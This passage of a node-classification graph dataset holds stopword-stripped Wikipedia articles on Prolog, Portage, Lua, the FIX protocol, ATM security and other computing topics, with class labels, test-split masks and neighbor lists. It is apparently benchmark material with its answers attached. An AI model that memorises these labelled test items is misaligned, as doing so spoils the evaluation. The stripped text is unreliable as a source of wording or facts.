earl sacerdoti planning execution monitoring jean-claude latombe computer-aided design richard fikes deductive retrieval steven coles early expert system guided use econometric model computers expensive single slow processor memories small comparison today planner adopted efficiency expedients including following gerry sussman eugene charniak seymour papert terry winograd visited university edinburgh 1971 spreading news micro-planner shrdlu casting doubt resolution uniform proof procedure approach mainstay edinburgh logicists university edinburgh bruce anderson implemented subset micro-planner called pico-planner anderson 1972 julian davies 1973 implemented essentially planner according donald mackenzie pat hayes recalled impact visit papert edinburgh become heart artificial intelligence logicland according papert mit colleague carl hewitt papert eloquently voiced critique resolution approach dominant edinburgh …and least one person upped sticks left papert mackenzie 2001 p 82 developments generated tension among logicists edinburgh tensions exacerbated uk science research council commissioned sir james lighthill write report ai research situation uk resulting report nowiki /nowiki lighthill 1973 mccarthy 1973 highly critical although shrdlu favorably mentioned pat hayes visited stanford learned planner returned edinburgh tried influence friend bob kowalski take planner account joint work automated theorem proving resolution theorem-proving demoted hot topic relic misguided past bob kowalski doggedly stuck faith potential resolution theorem proving carefully studied planner. ” according bruynooghe pereira siekmann van emden 2004 kowalski 1988 states recall trying convince hewitt planner similar sl-resolution planner invented purposes procedural embedding knowledge rejection resolution uniform proof procedure paradigm colmerauer roussel recalled reaction learning planner following way attending ijcai convention september ‘ 71 jean trudel met robert kowalski heard lecture terry winograd natural language processing fact use unified formalism left us puzzled time learned existence carl hewitt ’ programming language planner hewitt 1969 lack formalization language ignorance lisp fact absolutely devoted logic meant work little influence later research nowiki /nowiki colmerauer roussel 1996 fall 1972 philippe roussel implemented language called prolog abbreviation programmation en logique – french programming logic prolog programs generically following form special case backward-chaining planner prolog duplicated following aspects micro-planner prolog also duplicated following capabilities micro-planner pragmatically useful computers era saved space time use unique name assumption negation failure became questionable attention turned open systems hewitt de jong 1983 hewitt 1985 hewitt inman 1991 following capabilities micro-planner omitted prolog prolog include negation part raises implementation issues consider example negation included following prolog program program would unable prove p even though follows rules mathematical logic illustration fact prolog like planner intended programming language prove many logical consequences follow declarative reading programs work prolog valuable much simpler planner however need arose greater expressive power language prolog began include many capabilities planner left original version prolog",
    "neighbors": [
      10083,
      8421,
      6502,
      8262,
      9288,
      5361,
      10547,
      3446,
      9975,
      4025,
      1147,
      4799
    ],
    "mask": "None"
  },
  {
    "node_id": 4775,
    "label": 2,
    "text": "Portage_(software):portage software portage package management system originally created used gentoo linux also chrome os sabayon funtoo linux among others portage based concept ports collections gentoo sometimes referred meta-distribution due extreme flexibility portage makes operating-system-independent gentoo/alt project concerned using portage manage operating systems bsds macos solaris notable implementations gentoo/freebsd project ongoing effort called package manager specification project pms standardise document behaviour portage allowing ebuild tree gentoo system packages used alternative package managers paludis pkgcore goal specify exact set features behaviour package managers ebuilds serving authoritative reference portage portage similar bsd-style package management known ports originally designed freebsd ports mind portage written python programming language main utility defines gentoo although system known portage consists two main parts ebuild system emerge ebuild system takes care actual work building installing packages emerge provides interface ebuild managing ebuild repository resolving dependencies similar issues two therefore roughly relation rpm yum dpkg apt gtk+-based gui porthole available working portage also himerge gui stands haskell interface emerge portage characterized main function compiling source code packages user wishes install allows customization compiler target-application options fit system specifications user wishes functionalities related system management include allowing parallel package-version installation tracking cross-package dependencies managing database installed packages providing local ebuild repository synchronizing local portage tree remote repositories functionalities related individual package installation include specifying compilation settings target machine choosing package components portage distinguishes three levels stability ebuilds stable e.g. software works intended known security issues time release keyword masked mainly packages sufficiently tested target system architecture considered stable hard masked broken insecure packages emerge command-line tool heart portage command customizable many options modifiers emerge tool important utility accessing features portage command line program calculates manages dependencies executes ebuilds maintains local portage tree database installed packages compilation settings used ebuilds changed cflags environment variable based specifications individual computer user desire optimization emerge utility executes ebuilds sandbox environment way system protected software executed ebuild resulting binaries merged successful build sandboxed install emerge installs dependencies affected use flag-settings decide optional features included installing upgrading application emerge command also used download install precompiled binary files portage system offers use use flags allows users indicate software features would like include exclude building packages example use flag include dvd support available packages compiled flag enabled use flags affect dependencies required generally affecting optional features built given program compiled example packages use configure script use flag codice_1 would translate codice_2 specification use flags usual way configure programs gentoo use flags may set manually via user-friendly tools 'ufed use flag editor lists flags along description list available use flags available gentoo website use flag index gentoo default use binary packages package management systems like pacman employing instead format known ebuild whereas rpm binaries precompiled binaries ebuilds shell scripts variables functions contain description software instructions obtain configure compile install closely akin powerful .spec files distributed srpms 19,000 ebuilds available majority distributed gentoo mirrors new updated ebuilds obtained synchronizing local ebuild repository mirrors done executing command codice_3 historically gentoo provided pre-compiled binary packages many common programs especially lengthy compile mozilla firefox openoffice.org still installed emerge appending -bin package name instead install binary version gentoo binary packaging format .tbz2 file tar bzip2 compression additional metadata feature enables building binary packages one system using portage codice_4 codice_5 followed quick installation identical systems portage codice_6 codice_7 see portage features gentoo linux handbook information masking gentoo determines packages suitable system ebuilds designed different architectures experimental software usually masked manner prevents stable system installing without user intervention packages generally require testing often work fine said keyword masked i.e available systems accept_keywords make.conf entry starting character codice_8 codice_9 codice_10 codice_11 standard way unmask individual keyword masked package adding file full package name keyword codice_12 users make subdirectories well allowing custom organization example masked package multiple masked dependencies user could make directory name original masked package put mask files package dependencies directory scheme replaces older scheme codice_13 text file list packages known problems considered mature enough candidates stable hard masked one various package.mask files /usr/portage/profiles entries generally accompanied comment developers explaining reason mask",
    "neighbors": [
      10760,
      7181,
      8213,
      6680,
      9245,
      5155,
      5670,
      7722,
      5677,
      3131,
      3649,
      10817,
      3667,
      6227,
      9324,
      6257,
      1138,
      2168,
      7293,
      9342,
      6797,
      10387,
      10900,
      10394,
      7847,
      6828,
      9902,
      9908,
      5819,
      190,
      4302,
      2259,
      6361,
      8413,
      741,
      10469,
      231,
      2281,
      4841,
      237,
      7920,
      6898,
      6393,
      11525,
      2310,
      7435,
      7947,
      9487,
      788,
      1813,
      5397,
      8476,
      8992,
      6446,
      7983,
      304,
      1842,
      823,
      2872,
      3918,
      4951,
      9564,
      2401,
      1379,
      9063,
      8554,
      4972,
      10096,
      2417,
      8068,
      3462,
      8582,
      2955,
      2448,
      1952,
      11184,
      6583,
      8119,
      10172,
      9151,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      2010,
      7140,
      6119,
      5096,
      5612,
      1522,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 4776,
    "label": 1,
    "text": "Database_seeding:database seeding database seeding initial seeding database data seeding database process initial set data provided database installed especially useful want populate database data want develop future often automated process executed upon initial setup application data dummy data necessary data initial administrator account \\migrations\\configuration.cs appbundle/datafixtures/orm/customer.yml version 1 hautelook/alicebundle app/database/seeds/users.php",
    "neighbors": [
      3821
    ],
    "mask": "Test"
  },
  {
    "node_id": 4777,
    "label": 9,
    "text": "Lua_(programming_language):lua programming language lua meaning moon lightweight high-level multi-paradigm programming language designed primarily embedded use applications lua cross-platform since interpreter compiled bytecode written ansi c lua relatively simple c api embed applications lua originally designed 1993 language extending software applications meet increasing demand customization time provided basic facilities procedural programming languages complicated domain-specific features included rather included mechanisms extending language allowing programmers implement features lua intended general embeddable extension language designers lua focused improving speed portability extensibility ease-of-use development lua created 1993 roberto ierusalimschy luiz henrique de figueiredo waldemar celes members computer graphics technology group tecgraf pontifical catholic university rio de janeiro brazil 1977 1992 brazil policy strong trade barriers called market reserve computer hardware software atmosphere tecgraf clients could afford either politically financially buy customized software abroad reasons led tecgraf implement basic tools needed scratch lua predecessors data-description/configuration languages sol simple object language del data-entry language independently developed tecgraf 1992–1993 add flexibility two different projects interactive graphical programs engineering applications petrobras company lack flow-control structures sol del petrobras felt growing need add full programming power evolution lua language authors wrote lua 1.0 designed way object constructors slightly different current light flexible style incorporated data-description syntax sol hence name lua sol also portuguese word sun lua word moon lua syntax control structures mostly borrowed modula codice_1 codice_2 codice_3/codice_4 also taken influence clu multiple assignments multiple returns function calls simpler alternative reference parameters explicit pointers c++ neat idea allowing local variable declared need snobol awk associative arrays article published dr. dobb journal lua creators also state lisp scheme single ubiquitous data-structure mechanism list major influence decision develop table primary data structure lua lua semantics increasingly influenced scheme time especially introduction anonymous functions full lexical scoping several features added new lua versions versions lua prior version 5.0 released license similar bsd license version 5.0 onwards lua licensed mit license permissive free software licences almost identical lua commonly described multi-paradigm language providing small set general features extended fit different problem types lua contain explicit support inheritance allows implemented metatables similarly lua allows programmers implement namespaces classes related features using single table implementation first-class functions allow employment many techniques functional programming full lexical scoping allows fine-grained information hiding enforce principle least privilege general lua strives provide simple flexible meta-features extended needed rather supply feature-set specific one programming paradigm result base language light—the full reference interpreter 247 kb compiled—and easily adaptable broad range applications lua dynamically typed language intended use extension scripting language compact enough fit variety host platforms supports small number atomic data structures boolean values numbers double-precision floating point 64-bit integers default strings typical data structures arrays sets lists records represented using lua single native data structure table essentially heterogeneous associative array lua implements small set advanced features first-class functions garbage collection closures proper tail calls coercion automatic conversion string number values run time coroutines cooperative multitasking dynamic module loading classic hello world program written follows print hello world print 'hello world comment lua starts double-hyphen runs end line similar ada eiffel haskell sql vhdl multi-line strings comments adorned double square brackets factorial function implemented function example function factorial n end lua four types loops codice_2 loop codice_3 loop similar codice_7 loop numeric codice_8 loop generic codice_8 loop -- condition true condition end repeat condition first last delta -- delta may negative allowing loop count end generic codice_8 loop key value pairs _g end would iterate table codice_11 using standard iterator function codice_12 returns codice_13 also nested loop loop inside another loop local grid row ipairs grid end lua treatment functions first-class values shown following example print function behavior modified end future calls codice_14 routed new function lua lexical scoping old print function accessible new modified print lua also supports closures demonstrated function addto x end fourplus addto 4 print fourplus 3 -- prints 7 -- also achieved calling function following way print addto 4 3 -- calling returned function 'addto 4 argument 3 directly new closure variable codice_15 created every time codice_16 called new anonymous function returned always access codice_15 parameter closure managed lua garbage collector like object tables important data structures design built-in composite data type lua foundation user-created types conceptually similar associative arrays php dictionaries python hashes ruby perl table collection key data pairs data referenced key words hashed heterogeneous associative array tables created using codice_18 constructor syntax tables always passed reference see call sharing key index value except codice_13 nan including functions table often used structure record using strings keys use common lua features special syntax accessing fields using table store related functions act namespace tables automatically assigned numerical key enabling used array data type first automatic index 1 rather 0 many programming languages though explicit index 0 allowed numeric key codice_20 distinct string key codice_21 length table codice_22 defined integer index codice_23 codice_24 codice_13 codice_26 codice_13 moreover codice_28 codice_13 codice_23 zero regular array non-nil values 1 given codice_23 length exactly codice_23 index last value array holes nil values non-nil values codice_33 indices directly precedes codice_13 value may consider nil value end array table array objects using hash map emulate array normally slower using actual array however lua tables optimized use arrays help avoid issue extensible semantics key feature lua metatable concept allows lua tables customized powerful ways following example demonstrates infinite table codice_23 codice_36 give codice_23-th fibonacci number using dynamic programming memoization fibs 1 1 -- initial values fibs 1 fibs 2 setmetatable fibs although lua built-in concept classes object-oriented programming achieved using two language features first-class functions tables placing functions related data table object formed inheritance single multiple implemented using metatable mechanism telling object look nonexistent methods fields parent object concept class techniques rather prototypes used similar self javascript new objects created either factory method constructs new objects scratch cloning existing object lua provides syntactic sugar facilitate object orientation declare member functions inside prototype table one use equivalent calling class methods also makes use colon equivalent creating basic vector object vector.__index vector function vector new x z -- constructor end function vector magnitude -- another method end local vec vector new 0 1 0 -- create vector print vec magnitude -- call method output 1 print vec.x -- access member variable output 0 lua programs interpreted directly textual lua file compiled bytecode run lua virtual machine compilation process typically invisible user performed run-time done offline order increase loading performance reduce memory footprint host environment leaving compiler lua bytecode also produced executed within lua using codice_38 function string library codice_39 functions lua version 5.3.4 implemented approximately 24,000 lines c code like cpus unlike virtual machines stack-based lua vm register-based therefore closely resembles actual hardware design register architecture avoids excessive copying values reduces total number instructions per function virtual machine lua 5 one first register-based pure vms wide use perl's parrot android dalvik two well-known register-based vms example bytecode listing factorial function defined shown codice_40 5.1 compiler lua intended embedded applications provides c api purpose api divided two parts lua core lua auxiliary library lua api design eliminates need manual reference management c code unlike python api api like language minimalistic advanced functionality provided auxiliary library consists largely preprocessor macros assist complex table operations lua c api stack based lua provides functions push pop simple c data types integers floats etc stack well functions manipulating tables stack lua stack somewhat different traditional stack stack indexed directly example negative indices indicate offsets top stack example −1 top recently pushed value positive indices indicate offsets bottom oldest value marshalling data c lua functions also done using stack call lua function arguments pushed onto stack codice_41 used call actual function writing c function directly called lua arguments read stack example calling lua function c int main void running example gives c api also provides special tables located various pseudo-indices lua stack codice_42 prior lua 5.2 globals table codice_11 within lua main namespace also registry located codice_44 c programs store lua values later retrieval possible write extension modules using lua api extension modules shared objects used extend functionality interpreter providing native facilities lua scripts lua side module appears namespace table holding functions variables lua scripts may load extension modules using codice_45 like modules written lua growing collection modules known rocks available package management system called luarocks spirit cpan rubygems python eggs prewritten lua bindings exist popular programming languages including scripting languages c++ number template-based approaches automatic binding generators video game development lua widely used scripting language game programmers perhaps due perceived easiness embed fast execution short learning curve 2003 poll conducted gamedev.net showed lua popular scripting language game programming 12 january 2012 lua announced winner front line award 2011 magazine game developer category programming tools large number non-game applications also use lua extensibility luatex implementation tex type-setting language redis key-value database nginx web server scribunto extension lua available scripting language mediawiki software powers wikipedia wikis among uses allowing integration data wikidata articles powering",
    "neighbors": [
      515,
      3076,
      10761,
      2576,
      6160,
      8720,
      1556,
      9245,
      546,
      8739,
      2603,
      5677,
      50,
      2098,
      5684,
      9780,
      1591,
      9783,
      2105,
      2617,
      6718,
      11326,
      8771,
      10819,
      8262,
      6731,
      1101,
      10317,
      9808,
      595,
      84,
      6228,
      4182,
      10835,
      7256,
      7769,
      2138,
      4186,
      10841,
      11357,
      2656,
      2658,
      10851,
      102,
      1126,
      4200,
      9320,
      1130,
      7274,
      10854,
      5743,
      8303,
      8304,
      9330,
      9843,
      9848,
      3705,
      5754,
      7292,
      1152,
      9345,
      1666,
      5764,
      7813,
      5255,
      136,
      9354,
      2191,
      9871,
      10387,
      148,
      5783,
      155,
      3229,
      7326,
      3237,
      4777,
      10413,
      3762,
      1203,
      692,
      2739,
      7347,
      8883,
      190,
      10435,
      9926,
      5833,
      8909,
      7889,
      4822,
      10971,
      225,
      228,
      10470,
      9960,
      1257,
      2281,
      10991,
      10480,
      2804,
      2810,
      3323,
      7931,
      2304,
      2817,
      263,
      5896,
      10506,
      10510,
      9490,
      5395,
      1812,
      1813,
      9491,
      2843,
      6941,
      10526,
      8479,
      291,
      3876,
      295,
      8487,
      10537,
      7983,
      2864,
      7987,
      1347,
      1348,
      10565,
      9544,
      1353,
      10569,
      8524,
      333,
      846,
      847,
      338,
      10581,
      2903,
      10584,
      7513,
      11098,
      11610,
      6493,
      865,
      3939,
      10083,
      8549,
      6502,
      11625,
      8554,
      9579,
      3960,
      8057,
      1916,
      7550,
      1920,
      3969,
      386,
      6016,
      6528,
      3462,
      8582,
      394,
      9614,
      8082,
      1435,
      6044,
      6558,
      10654,
      1952,
      7076,
      9128,
      5546,
      8618,
      428,
      2481,
      4529,
      6074,
      443,
      6587,
      9666,
      963,
      5059,
      8644,
      966,
      4550,
      5578,
      5067,
      7629,
      1999,
      8147,
      5588,
      11219,
      10198,
      2519,
      4056,
      4057,
      477,
      482,
      4069,
      7147,
      5612,
      9714,
      8691,
      6132,
      10739,
      11259,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4778,
    "label": 5,
    "text": "Financial_Information_eXchange:financial information exchange financial information exchange fix protocol electronic communications protocol initiated 1992 international real-time exchange information related securities transactions markets trillions dollars traded annually nasdaq alone financial service entities investing heavily optimizing electronic trading platforms employing direct market access dma increase speed financial markets managing delivery trading applications keeping latency low increasingly requires understanding fix protocol fix protocol specification originally authored 1992 robert bob lamoureux chris morstatt enable electronic communication equity trading data fidelity investments salomon brothers fix initially addressed information broker-dealers institutional clients time information communicated verbally telephone fidelity realized information broker-dealers could routed wrong trader simply lost parties hung phones wanted communications replaced machine-readable data could shared among traders analyzed acted stored example broker-dealers call indication interest ioi buy sell block stock fix initiative created new messages ioi according fix trading community fix become de facto messaging standard pre-trade trade communication global equity markets expanding post-trade space support straight-through processing well continuing expand foreign exchange fixed income derivatives markets fix trading community non-profit industry-driven standards body mission address business regulatory issues impacting multi-asset trading across global financial markets increased use standards including fix protocol messaging language delivering operational efficiency increased transparency reduced costs risk market participants fix widely used sell side institutions well buy side brokers/dealers financial markets among users mutual funds investment banks brokers stock exchanges ecns see fix trading community organization extensive list major fix users fix become standard electronic protocol pre-trade communications trade execution although mainly used equity transactions front office area bond derivatives fx-transactions also possible one could say whereas swift standard back office messaging fix standard front office messaging however today membership fix protocol ltd. extending fix block trade allocation phases trading process every market virtually every asset class originally fix standard monolithic including application layer semantics message encoding session layer single technical specification remained monolithic fix version 4.2 thereafter message encodings session layer specifications began split separate documents ultimately fix evolved family related technical standards message encoding called presentation layer open systems interconnection model osi model responsible wire format messages original fix message encoding known tagvalue encoding field consists unique numeric tag value tag identifies field semantically therefore messages self-describing tagvalue encoding character-based using ascii codes message fields delimited using ascii 01 start header character composed header body trailer fix.4.4 header contained three fields 8 codice_1 9 codice_2 35 codice_3 tags fixt.1.1 fix.5.0 header contains five mandatory fields one optional field 8 codice_1 9 codice_2 35 codice_3 49 codice_7 56 codice_8 1128 codice_9 present must 6th position content body message specified tag 35 codice_3 message type defined header last field message tag 10 fix message checksum always expressed three-digit number e.g codice_11 header+body+trailer fix content example fix message execution report pipe character used represent soh character fixmessage body length 9 correct checksum 10 checked using source available quickfix open-source fix implementation fix messages formed number fields field tag value pairing separated next field delimiter soh 0x01 tag integer indicates meaning field value array bytes hold specific meaning particular tag e.g tag 48 securityid string identifies security tag 22 idsource integer indicates identifier class used values may plain text encoded pure binary case value preceded length field fix protocol defines meanings tags leaves range tags reserved private use consenting parties fix protocol also defines sets fields make particular message within set fields mandatory others optional ordering fields within message generally unimportant however repeating groups preceded count encrypted fields preceded length message broken three distinct sections head body tail fields must remain within correct section within section position may important fields act delimiters stop one message running next final field fix message tag 10 checksum two main groups messages—admin application admin messages handle basics fix session allow session started terminated recovery missed messages application messages deal sending receiving trade-related information order request information current state subsequent execution order body length character count starting tag 35 included way tag 10 excluded soh delimiters count body length. br example soh replaced by'| br body length 65. br soh delimiter end tag=value belongs tag checksum fix message always last field message composed three characters tag 10 given summing ascii value characters message except checksum field performing modulo 256 resulting summation example message summation ascii values including soh character value 1 ascii table results 4158 performing modulo operation gives value 62 since checksum composed three characters 062 used fixml xml schema fix messages semantically equivalent tagvalue encoded messages takes advantage xml parser technology fixml commonly used back-office clearing applications rather trading simple binary encoding defines wire format using primitive data types native computing systems message encoding decoding therefore much lower latency character-based protocols since translation needed put data format computers use aside latency advantages performance deterministic sbe messages constrained templates fixed-length data elements preferred another consequence fields generally fixed position message filters routers need crack entire message access key fields sbe developed fix high performance working group support high performance trading tagvalue encoding deemed longer fit-for-purpose since character based rather binary variable-length fields messages result non-deterministic performance unlike tagvalue fixml sbe message self-describing data sent wire minimal header identify template controls message metadata describes message layout exchanged out-of-band peers fix trading community publishes xml schema sbe message schemas message schema may contain number message templates template describes fields constitute message additionally schema provides listing simple composite data types may reused number fields fix trading community also developed standard mappings fix message protocols including session layer responsible message exchange including checkpoint recovery mechanisms original fix session protocol name since part monolithic specification covering application layer semantics message encoding well however starting fix version 5.0 session layer split independent specification introduction fixt fixt largely original unnamed session layer version 4.x offered one significant innovation -- provided mechanism mix fix application layer versions common session version current fixt version 1.1 theoretically fixt transport independent however usually employed transmission control protocol tcp fixt point-to-point protocol guarantees message delivery directions messages sent direction carry message sequence number message header communication fault peer may request retransmission missed messages message delivery supported even event disconnection later reestablishment session implement session establishment guaranteed delivery fixt classic fix 4.x define session message types fixp developed fix high performance working group meet needs high performance trading primary need low latency message encoding decoding control message delivery guarantees provide low latency binary message encodings supported session layer application messages actual wire format abstracted fixp specification users may select fix encoding choice long peers agree protocol use early development used simple binary encoding fixp covers point-to-point multicast use cases common primitives point-to-point session established peers negotiate delivery guarantees among following choices delivery guarantees may asymmetrical example trader may enter orders idempotent flow executions returned recoverable flow fast moving markets delay inherent retransmission often undesirable resulting missed opportunities bad trades diagram fix messaging looks buyside/customer sellside/supplier latest version fix protocol implements transport independence permitting multiple versions application messages carried single version transport independent fix session fixt.1.1 higher transport independence also paves way transport protocols message queues web services used instead traditional fix tcp fix supports algorithmic trading use fix algorithmic trading definition language fixatdl fix protocol limited released fast protocol stands fix adapted streaming fast binary protocol used mostly sending multicast market data via udp connections many companies offer fix testing products services",
    "neighbors": [
      4778,
      10020,
      10924,
      10486
    ],
    "mask": "Test"
  },
  {
    "node_id": 4779,
    "label": 9,
    "text": "Common_Lisp_Music:common lisp music clm originally acronym common lisp music music synthesis signal processing package music v family created bill schottstaedt runs number various lisp implementations part snd audio editor using scheme ruby forth also realtime implementation snd-rt developed kjetil s. matheussen software used digitally stretch beethoven 9th symphony create leif inge 9 beet stretch",
    "neighbors": [
      4865,
      2438,
      4606,
      9865,
      2062,
      9877,
      4122,
      1448,
      9128,
      8883,
      6969,
      6201,
      7867,
      3904,
      8258,
      8771,
      4550,
      11083,
      8908,
      1613,
      9299,
      1365,
      2392,
      7896,
      6493,
      7267,
      10083,
      3176,
      2667,
      9210,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 4780,
    "label": 2,
    "text": "Mark_Adler:mark adler mark adler born april 3 1959 american software engineer best known work field data compression author adler-32 checksum function co-author zlib compression library gzip contributed info-zip participated developing portable network graphics png image format adler also spirit cruise mission manager mars exploration rover mission adler born miami florida raised child david bertha adler adler earned bachelor science mathematics master science electrical engineering degrees university florida 1981 1985 respectively 1990 adler earned ph.d. physics california institute technology doctorate adler worked hughes aircraft space communications group working diverse projects including analysis effects x-ray bursts satellite cables development new error-correcting codes designing automobile anti-theft key digital image video compression research wavelets mpeg-2 1992 1995 adler lead mission engineer cassini–huygens mission afterwards became mars exploration program architect jet propulsion laboratory jpl 1996 1998 meant adler responsible planning mars exploration missions 2001 well handling inter-project engineering issues missions flight development time 1999 early 2000 adler mission systems manager chief engineer mars sample return project launch three missions 2003 2005 bring martian samples back earth 2008 project canceled failure mars polar lander adler initiated led three-and-a-half-week study concept later selected mars exploration rover mer mission 2003 served deputy mission system manager acting project engineer deputy assembly test launch operations manager landing site selection engineer spirit mission manager adler currently project chief low density supersonic decelerator adler instrument-rated private pilot certified scuba diver amateur theater actor lives diana st. james la cañada california two children joshua zachary st. james works california institute technology acts directs theatrical performances together co-author jean-loup gailly adler received 2009 usenix software tools user group stug award contributions floss algorithms data compression",
    "neighbors": [
      3296,
      7366,
      4561,
      2804,
      8671
    ],
    "mask": "None"
  },
  {
    "node_id": 4781,
    "label": 1,
    "text": "List_of_in-memory_databases:list in-memory databases article list in-memory database system software",
    "neighbors": [
      10883,
      6277,
      5640,
      6920,
      7946,
      11017,
      3219,
      7315,
      11030,
      9893,
      8871,
      5546,
      1579,
      8619,
      6831,
      9263,
      7347,
      949,
      6709,
      5051,
      573,
      6850,
      11203,
      10565,
      10693,
      8269,
      7767,
      5209,
      5210,
      1636,
      3045,
      10340,
      9320,
      4604,
      2045,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 4782,
    "label": 9,
    "text": "Spacecraft_command_language:spacecraft command language spacecraft command language satellite control language spacecraft control language systems test operation language stol satellite test operation language etc computer command language commanding spacecraft mission systems ultimately languages used command remote spacecraft telecommands also used development verification onboard systems prototype engineering model flight hardware software ground systems prior launch spacecraft command languages typically written format similar human languages contrast telecommand protocols usually binary formats although may displayed hexadecimal broken labelled fields command displays spacecraft command languages scl plexil executed spacecraft onboard executive nasa gsfc systems test operation language stol functional requirements language description 1978 illustrates concept systems test operation language stol provides means user communication payloads applications programs ground system elements systems operation language enables operator user communicate command computer system system interprets high level language directive user performs indicated action executing program printing snapshot sending payload command using stol payload test operations personnel may relieved repetitive tasks ensuring recurring fixed sequences operations always performed exactly order guaranteeing repeatability test procedures project operations control center pocc operations original language acronym stol applied gsfc systems test operation language designed 1970s nasa goddard space flight center provide standardized language functionality previously represented least three satellite operation language efforts gsfc various stols created locations mission-specific site-specific names proliferated extent jargon interpreter program prototyped one gsfc convert english statements limited set mstol directives plans stol dialects.. languages later developed offered private companies part satellite control software suites following examples show natural language cstol commands lower-level spacecraft commands translated particular spacecraft first two examples show two different cstol commands translated spacecraft command indicating spacecraft command takes different values argument last example cstol command translated another cstol command would translated spacecraft command still-human-readable textual format command uplinked as-is spacecraft ability read text format otherwise command translated packed binary representation ground prior uplink",
    "neighbors": [
      9926,
      7308,
      8046,
      5680,
      3221
    ],
    "mask": "Test"
  },
  {
    "node_id": 4783,
    "label": 9,
    "text": "Symbolic_data_analysis:symbolic data analysis symbolic data analysis sda extension standard data analysis symbolic data tables used input symbolic objects made output result data units called symbolic since complex standard ones contain values categories also include internal variation structure sda based four spaces space individuals space concepts space descriptions space symbolic objects space descriptions models individuals space symbolic objects models concepts",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4784,
    "label": 4,
    "text": "Security_of_automated_teller_machines:security automated teller machines automated teller machines atms first introduced 1939 2015 3 million units installed worldwide number atm units increase machines prone hacker attacks fraud robberies security breaches past main purpose atms deliver cash form bank notes debit corresponding bank account however atms becoming complicated serve numerous functions thus becoming high priority target robbers hackers modern atms implemented high-security protection measures work complex systems networks perform transactions data processed atms usually encrypted hackers employ discreet hacking devices hack accounts withdraw account balance alternative unskilled robbers threaten bank patrons weapon loot withdrawn money account main article atm fraud atm vandals either physically tamper atm obtain cash employ credit card skimming methods acquire control user credit card account credit card fraud done inserting discreet skimming devices keypad credit card reader alternative way credit card fraud identify pin directly devices cameras concealed near keypad validation on-line pin occurs terminal question connected central database pin supplied customer always compared recorded reference pin financial institutions however one disadvantage malfunction network renders atm unusable fixed off-line pin validation atm connected central database condition off-line pin validation atm able compare customer entered pin pin reference terminal must able perform cryptographic operations must required encryption keys disposal offline validation scheme extremely slow inefficient offline pin validation obsolete atms connected central server protected wireless networks three pin procedures operation high security interchange transaction supplied pin encrypted entry terminal step secret cryptographic key used addition transaction elements encrypted pin transmitted acquirer system encrypted pin routed acquirer system hardware security module within pin decrypted cryptographic key used interchange decrypted key immediately reencrypted routed issuer system normal communications channels lastly routed pin decrypted issuer security module validated basis techniques on-line local pin validation different transaction methods used shared atms regards encipherment pin message authentication among called zone encryption method trusted authority appointed operate behalf group banks could interchange messages atm payment approvals successful communication banks atms incorporation cryptographic module usually called security module critical component maintaining proper connections banks machines security module designed tamper resistant security module performs plethora functions among pin verification pin translation interchange key management message authentication use pin interchanges causing concerns security pin translated security module format used interchange moreover security module generate protect maintaining keys associated user network personal verification process begins user supply personal verification information information include pin provided customer information recorded bank account cases storage cryptographic key bank card called personal key pk personal identification processes done authentication parameter ap capable operating two ways first option ap time invariant second option ap time variant case ip based time variant information transaction request message case ap used message authentication code mac use message authentication made recourse find stale bogus messages might routed communication path detection modified messages fraudulent traverse non-secure communication systems cases ap serves two purposes security breaches electronic funds transfer systems done without delimiting components electronic funds transfer systems three components communication links computers terminals atms first communication links prone attacks data exposed passive means direct means device inserted retrieve data second component computer security different techniques used acquire access computer accessing via remote terminal peripheral devices card reader hacker gained unauthorized access system programs data manipulated altered hacker terminal security significant component cases cipher keys reside terminals absence physical security abuser may probe key substitutes value",
    "neighbors": [
      2932
    ],
    "mask": "Test"
  },
  {
    "node_id": 4785,
    "label": 4,
    "text": "Video_door-phone:video door-phone video door-phone also known video door entry video intercom stand-alone intercom system used manage calls made entrance building residential complex detached family home workplace etc access controlled audiovisual communication inside outside main feature video door entry enables person indoors identify visitor wish engage conversation and/or open door allow access person calling video door entry consists outside indoor elements outdoor panel outside electronic lock release indoor monitor outdoor panel street panel installed beside entrance door gateway incorporates different elements ready use climate conditions one several pushbuttons make call usually one per home apartment micro camera adapted night vision capture image caller microphone pick voice speaker reproduce voice occupant indoors video door entry panel may include push buttons call homes offices camera capture street scene video entry monitor allows occupant see called talk visitor open door installed indoors monitor consists screen showing image person calling microphone earpiece conversation pushbutton trigger door lock release communication set full duplex electric door release device installed door lock operated inside building lift latch clear way visitor several variations basic format addition outdoor panels one pushbutton per apartment possible find others numeric keypad case designed large residential installations homes identified codes others built-in cardholders panels even small screens guide user facilitate entry people disabilities video entry monitors earpiece similar telephone handset others hands-free examples monitors memories store image every time someone calls door touchscreen video entry systems video door phone classified two possible classification 1 security layers level 1 security – security layer added vdp system community entrance layer given guard directly verify entry visitor community systems community level b level 2 security also known lobby security – get access lobby apartment case visitor dial number flat flat owner allows access visitor lobby entrance c. level 3 security case visitor communicates outdoor camera front house door villa gate 2 technologies classification a. standalone – standalone vdp device used villas individual home owners types technology standalone vdp – i. analog vdp – analog display camera ii.connected digital vdp – digital lcd display digital camera usually image capture video capturing ability bell pressed case normally additional camera integration also allowed iii wireless video door bell vdb camera units gets connected interned router allows communication ones mobile tablet top communicate visitor b. multi-apartment- solution mass housing scenario i. analog multi-apartment systems – analog vdp providing 3 tier security ii ip vdp multi-apartment system – ip vdp 3 tier security integration bms building management system security systems like intrusion cctv building security cases even home automation visitor presses one outdoor panel pushbuttons built-in camera connected image captured outdoors appears monitor screen connection takes place automatically need activate equipment one essential elements video door entry point person inside building open door wish begin conversation usually secret heard users facility equipment also disconnects automatically set time elapsed video entry system whole runs low voltage energy building ’ trunk many terminals currently market ready accept extensions making monitor small automatic function control centre user view one several additional cameras installed access points trigger light switches open second door etc video door entry systems commonly found integrated different access control systems means elements installed outdoor panel allow certain previously authorised users access premises common means proximity cards fingerprint readers keypad secret numbers even bluetooth triggered mobile phone different equipment sets currently found market make use accessible people different disabilities thinking visually impaired outdoor panel may include information braille alongside pushbuttons voice synthesiser also added indicates door opened people hearing impairment outdoor panel may include screen icons signalling communication status user calling someone speaking indoors opening door also type user mind monitor may fitted inductive loop element interacts conventional hearing aids facilitate conversation outside without presence noticed users kit also includes visual audio call alerts",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4786,
    "label": 9,
